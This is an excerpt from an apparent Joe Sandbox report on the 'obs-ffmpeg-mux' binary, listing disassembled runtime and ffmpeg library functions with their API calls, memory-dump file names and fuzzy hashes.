                                                            Function 00007FFDA381A8B4 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: 7fdba593edf5c2be57765e2ee8e76f93c7495288ee8010476706ab2a19b5b13b
                                                            • Instruction ID: 1b3a6b1df8e095af549e37bc99333837fee0efc7383c988e79826bdd49c27991
                                                            • Opcode Fuzzy Hash: 7fdba593edf5c2be57765e2ee8e76f93c7495288ee8010476706ab2a19b5b13b
                                                            • Instruction Fuzzy Hash: 2CD19F32B09B8186EB209B75D4A13AD77A2FB45798F100175EE8D67B96CF3EE080C744
                                                            Function 00007FFDA382F9C8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFDA38301BC,?,?,?,?,00007FFDA3826D5D,?,?,?,?,00007FFDA3816364), ref: 00007FFDA382FB44
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFDA38301BC,?,?,?,?,00007FFDA3826D5D,?,?,?,?,00007FFDA3816364), ref: 00007FFDA382FB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: 3c623b4c913abd76a5853a759542e999bc4493d2e0e3f0ebf5aee22177e2fc78
                                                            • Instruction ID: f35791ab0cafd4b21140085aacab7129f7300b4fec504e168b7b37afffdcc065
                                                            • Opcode Fuzzy Hash: 3c623b4c913abd76a5853a759542e999bc4493d2e0e3f0ebf5aee22177e2fc78
                                                            • Instruction Fuzzy Hash: 3C415521B1B60281FA12CB7298301352393BF09B90F594536DD2E6B786EF3FE401C708
                                                            Function 00007FFDA38220BC Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p$p
                                                            • API String ID: 3215553584-1995029353
                                                            • Opcode ID: ced69d13e143899f142fc6a402910ce540b67e7937260230ecd24125dfedc697
                                                            • Instruction ID: ae0c3d240eecdc1be616a17e49948f2162613e7d804d806a057628eb7af66f56
                                                            • Opcode Fuzzy Hash: ced69d13e143899f142fc6a402910ce540b67e7937260230ecd24125dfedc697
                                                            • Instruction Fuzzy Hash: 5712B462F0E14386FBA45BB4F02467972A3FB40750F844175D6AA667C6DF3FE5808B0A
                                                            Function 00007FF71E742370 Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • avcodec_free_context.AVCODEC-60 ref: 00007FF71E742388
                                                            • avformat_free_context.AVFORMAT-60 ref: 00007FF71E7423CC
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            • av_free.AVUTIL-58 ref: 00007FF71E7423B1
                                                            • avio_context_free.AVFORMAT-60 ref: 00007FF71E7423BD
                                                            • avio_close.AVFORMAT-60 ref: 00007FF71E7423C4
                                                            • avcodec_free_context.AVCODEC-60 ref: 00007FF71E742402
                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E742415
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$avcodec_free_context$av_freeavformat_free_contextavio_closeavio_context_freefree
                                                            • String ID:
                                                            • API String ID: 1086289117-0
                                                            • Opcode ID: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
                                                            • Instruction ID: dbde5896fff89481e5d9d154fbb7d3a2435b619125e0813ddb931b0ec31d1098
                                                            • Opcode Fuzzy Hash: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
                                                            • Instruction Fuzzy Hash: 09212F32A14A9582FB11BF25F45127CA3A0FB48F98F855536DA4D4766ACF38E45E8320
                                                            Function 00007FFDA3817620 Relevance: 9.2, APIs: 6, Instructions: 206COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 2829165498-0
                                                            • Opcode ID: 19bdea05b89112efca26a76af5801f63f8593368eda608c20a3d38d473ed6fde
                                                            • Instruction ID: 42b24d1edf3e953c8dad597328cbfd16954eddce7ad38aa0048b0de29ef253e6
                                                            • Opcode Fuzzy Hash: 19bdea05b89112efca26a76af5801f63f8593368eda608c20a3d38d473ed6fde
                                                            • Instruction Fuzzy Hash: 2E81D272B0A74186EB208F31E4602797296FF447A4F140679EA5D67BDADF3FD4048708
                                                            Function 00007FFDA379B030 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: type_info::_name_internal_method$LockitMpunctchar_traitsstd::_$Concurrency::details::EmptyGetfacetLockit::_Lockit::~_Queue::StructuredWorkstd::locale::_
                                                            • String ID:
                                                            • API String ID: 1948620569-0
                                                            • Opcode ID: db001cbab32b706852569352078046197d6a6324535291e71047bb6a88349dca
                                                            • Instruction ID: 39feaf06bc53a67843cce2f3164515ee8b32d28989441e5c6ca00a360451647f
                                                            • Opcode Fuzzy Hash: db001cbab32b706852569352078046197d6a6324535291e71047bb6a88349dca
                                                            • Instruction Fuzzy Hash: D191193260DAC186E6A1DB15E4A03EEB7A1F7C9780F404532EA8D53BAADF7DD544CB04
                                                            Function 00007FFDA378EA00 Relevance: 9.2, APIs: 6, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fgetc
                                                            • String ID:
                                                            • API String ID: 1720979605-0
                                                            • Opcode ID: 28baa0b0cff05df5d8ba91b69c61c4991e3271d68468491054d9f83255bc8580
                                                            • Instruction ID: 7d4ea26cc70fea56043afd74ed0ee75e4e5fa3a39737d8e075005e83fd37aea6
                                                            • Opcode Fuzzy Hash: 28baa0b0cff05df5d8ba91b69c61c4991e3271d68468491054d9f83255bc8580
                                                            • Instruction Fuzzy Hash: D1814122A1E68186DA60DB65E4603BEB7A2FBC1740F500132E78D63BABDF3DD444CB44
                                                            Function 00007FFDA381E0EC Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 2b2e7281846eac4043168013672503d634fe1231328cb35edb1c4f3e79524dcf
                                                            • Instruction ID: ce40f54c660d338a534c9aaf16140f69411e155bac6897da953e3c6c9ba33d2f
                                                            • Opcode Fuzzy Hash: 2b2e7281846eac4043168013672503d634fe1231328cb35edb1c4f3e79524dcf
                                                            • Instruction Fuzzy Hash: EA516232B0B646C5E7915F3490B12BDBB92AB45B44F5580B1D69D273C7CE2FB446830A
                                                            Function 00007FFDA378B5F0 Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: InvalidatePaintRect$BeginMessagePostProcQuitWindow
                                                            • String ID:
                                                            • API String ID: 1653709837-0
                                                            • Opcode ID: 4e47f12e20544a685814b25160754904f3f71da83a83e271505d26e52fa5ec43
                                                            • Instruction ID: 34a5260ac9290fba83cba17370ebcb06c6b0668d8d2b002d54b07b5256299297
                                                            • Opcode Fuzzy Hash: 4e47f12e20544a685814b25160754904f3f71da83a83e271505d26e52fa5ec43
                                                            • Instruction Fuzzy Hash: 7C410C32B1D78287EB718B25E46437A73A2FB89741F404176E58D52BA6CF3ED544CB08
                                                            Function 00007FFDA3794300 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 324COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Mpunct$ctypestd::ios_base::width
                                                            • String ID: @
                                                            • API String ID: 3075750325-2766056989
                                                            • Opcode ID: 9bf69f025c1eb2cbc33cc278e590e33956c0914addd07cff6ffa4e72e4424e43
                                                            • Instruction ID: 089c08cbe891515ca7b39a909c694a9603f110a0eb0b22bd4c7f37f00b8ce112
                                                            • Opcode Fuzzy Hash: 9bf69f025c1eb2cbc33cc278e590e33956c0914addd07cff6ffa4e72e4424e43
                                                            • Instruction Fuzzy Hash: 70F1073260EAC585DAA0DA55E4A53EFB7A2F7C8780F400132DACD93B6ADF6DD540CB44
                                                            Function 00007FFDA381AD84 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 3523768491-393685449
                                                            • Opcode ID: e32796bb40b43773fb6ff2aec2c181e8fb4c61f107ad230eeb5657ec601adcee
                                                            • Instruction ID: 6d9ea1162b9c4a66a3bd7dac4a2a5818b0727dc6c986b250dc700b0d06c25fc6
                                                            • Opcode Fuzzy Hash: e32796bb40b43773fb6ff2aec2c181e8fb4c61f107ad230eeb5657ec601adcee
                                                            • Instruction Fuzzy Hash: 2FE1E072A097828AEB219F38D4A02BC77A2FB45748F140175DE8D67797CF3AE085C744
                                                            Function 00007FFDA378B7A0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$CreateDeleteLineMove
                                                            • String ID:
                                                            • API String ID: 3907703346-0
                                                            • Opcode ID: 7131f109ee3d4d982530c122e500a4da8b05a98b84a19a0d41db410ebf70dfcc
                                                            • Instruction ID: 2d477a2d468958dba95b4c23a1cfdb188f199b31c228fc827634c00eaba0c84e
                                                            • Opcode Fuzzy Hash: 7131f109ee3d4d982530c122e500a4da8b05a98b84a19a0d41db410ebf70dfcc
                                                            • Instruction Fuzzy Hash: A831223671EA4282DA20DF21F86016EB362FFC8795F504131E58E53B6ACF3EE5448744
                                                            Function 00007FFDA381A184 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: 11bdc3168604b98f9a22173b748ebd876aaedb3b5a2e0641ea68a9a9cd424268
                                                            • Instruction ID: 80755538312f4d2d1cb2068ab3731c4904f3c6af2101546dc461268304a8ad75
                                                            • Opcode Fuzzy Hash: 11bdc3168604b98f9a22173b748ebd876aaedb3b5a2e0641ea68a9a9cd424268
                                                            • Instruction Fuzzy Hash: 98B19321B0F64281EA65DB71D5A067863A6AF84F84F0984B5DE4D277CBDF3FE4418348
                                                            Function 00007FFDA382A098 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0B7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0D6
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0FE
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A10F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A120
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 377d35087988872d8a55d92d034d61dff08062d6b5dda0b41b9dc53d8abc3ca9
                                                            • Instruction ID: 4c95e0d272c0df815b65f17da71c496decbc6c66f8fb53c1e9a96d6eb58951e4
                                                            • Opcode Fuzzy Hash: 377d35087988872d8a55d92d034d61dff08062d6b5dda0b41b9dc53d8abc3ca9
                                                            • Instruction Fuzzy Hash: D8118E20F0F24281FA5897B5AA7117921436F847F0F4847B6E83E267D7EE2FF401860A
                                                            Function 00007FFDA38330EC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
